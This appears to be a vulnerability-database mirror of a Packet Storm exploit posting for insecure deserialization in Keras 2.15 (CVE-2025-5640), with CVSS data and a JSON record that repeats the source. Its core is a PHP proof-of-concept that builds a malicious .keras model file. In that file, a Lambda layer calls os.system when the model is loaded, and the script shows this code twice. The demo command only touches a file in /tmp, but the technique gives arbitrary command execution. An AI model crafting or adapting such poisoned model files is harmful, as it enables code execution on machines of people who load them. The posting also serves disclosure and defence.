📄 Keras 2.15 Insecure Deserialization_PACKETSTORM:213014

4.8 / 10

MEDIUM

CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/SC:N/VI:N/SI:N/VA:L/SA:N

Description

Keras version 2.15 insecure deserialization proof of concept exploit. A security issue in certain versions of Keras allows attackers to craft a malicious model file typically a .keras or HDF5-based model containing unsafe serialization primitives. When...

Visit Original Source

Basic Information

ID PACKETSTORM:213014

Published Dec 18, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Keras 2.15 insecure deserialization |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://keras.io/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/202894/ & CVE-2025-5640

[+] Summary :

A security issue in certain versions of Keras allows attackers to craft a malicious model file (typically a .keras or HDF5-based model)
containing unsafe serialization primitives. When such a model is loaded, the deserialization process may allow execution of arbitrary functions
or system commands if unsafe layers such as Lambda with custom functions are used.
This issue arises because the framework may deserialize user-defined functions without full sandboxing or validation, enabling attackers to embed object configurations that trigger execution during model loading.
Mitigation requires strict disabling of custom object loading, enforcing safe-load mechanisms, updating to patched versions, and avoiding untrusted model files

[+] POC : php poc.php

<?php
class SimpleKerasExploit {
public function createMaliciousModel($outputFile = "malicious_model.keras") {
$tempDir = sys_get_temp_dir() . '/keras_' . uniqid();
mkdir($tempDir, 0755, true);

// Create config
$config = array(
"class_name" => "Functional",
"config" => array(
"name" => "pwned_model",
"layers" => array(
array(
"class_name" => "Lambda",
"config" => array(
"name" => "evil_lambda",
"function" => array(
"class_name" => "function",
"config" => array(
"module" => "os",
"function_name" => "system",
"registered_name" => null
)
),
"arguments" => array('touch /tmp/pwned_simple.keras')
)
)
)
)
);

file_put_contents($tempDir . '/config.json', json_encode($config));
file_put_contents($tempDir . '/metadata.json', json_encode(array("keras_version" => "2.15.0")));

$zip = new ZipArchive();
if ($zip->open($outputFile, ZipArchive::CREATE) === TRUE) {
$zip->addFile($tempDir . '/config.json', 'config.json');
$zip->addFile($tempDir . '/metadata.json', 'metadata.json');
$zip->close();
echo "✅ Malicious model created: $outputFile\n";
}

// Cleanup
array_map('unlink', glob("$tempDir/*"));
rmdir($tempDir);
}
}

$exploit = new SimpleKerasExploit();
$exploit->createMaliciousModel();
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-18T16:39:23",
    "description": "Keras version 2.15 insecure deserialization proof of concept exploit. A security issue in certain versions of Keras allows attackers to craft a malicious model file typically a .keras or HDF5-based model containing unsafe serialization primitives. When...",
    "published": "2025-12-18T00:00:00",
    "modified": "2025-12-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Keras 2.15 Insecure Deserialization",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213014",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-5640"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Keras 2.15 insecure deserialization                                                                                         |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://keras.io/                                                                                                           |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/202894/ &  \tCVE-2025-5640\n    \n    [+] Summary : \n    \n    A security issue in certain versions of Keras allows attackers to craft a malicious model file (typically a .keras or HDF5-based model) \n    containing unsafe serialization primitives. When such a model is loaded, the deserialization process may allow execution of arbitrary functions \n    or system commands if unsafe layers such as Lambda with custom functions are used.\n    This issue arises because the framework may deserialize user-defined functions without full sandboxing or validation, enabling attackers to embed object configurations that trigger execution during model loading.\n    Mitigation requires strict disabling of custom object loading, enforcing safe-load mechanisms, updating to patched versions, and avoiding untrusted model files\n                  \n    \t\t\t\n    [+]  POC : php poc.php\n    \n    <?php\n    class SimpleKerasExploit {\n        public function createMaliciousModel($outputFile = \"malicious_model.keras\") {\n            $tempDir = sys_get_temp_dir() . '/keras_' . uniqid();\n            mkdir($tempDir, 0755, true);\n            \n            // Create config\n            $config = array(\n                \"class_name\" => \"Functional\",\n                \"config\" => array(\n                    \"name\" => \"pwned_model\",\n                    \"layers\" => array(\n                        array(\n                            \"class_name\" => \"Lambda\",\n                            \"config\" => array(\n                                \"name\" => \"evil_lambda\",\n                                \"function\" => array(\n                                    \"class_name\" => \"function\",\n                                    \"config\" => array(\n                                        \"module\" => \"os\",\n                                        \"function_name\" => \"system\",\n                                        \"registered_name\" => null\n                                    )\n                                ),\n                                \"arguments\" => array('touch /tmp/pwned_simple.keras')\n                            )\n                        )\n                    )\n                )\n            );\n            \n            file_put_contents($tempDir . '/config.json', json_encode($config));\n            file_put_contents($tempDir . '/metadata.json', json_encode(array(\"keras_version\" => \"2.15.0\")));\n            \n            $zip = new ZipArchive();\n            if ($zip->open($outputFile, ZipArchive::CREATE) === TRUE) {\n                $zip->addFile($tempDir . '/config.json', 'config.json');\n                $zip->addFile($tempDir . '/metadata.json', 'metadata.json');\n                $zip->close();\n                echo \"\u2705 Malicious model created: $outputFile\\n\";\n            }\n            \n            // Cleanup\n            array_map('unlink', glob(\"$tempDir/*\"));\n            rmdir($tempDir);\n        }\n    }\n    \n    $exploit = new SimpleKerasExploit();\n    $exploit->createMaliciousModel();\n    ?>\n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213014",
    "cvss": {
        "score": 4.8,
        "severity": "MEDIUM",
        "vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/SC:N/VI:N/SI:N/VA:L/SA:N",
        "version": "4.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "3.0",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
        }
    },
    "href": "https://packetstorm.news/files/id/213014/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply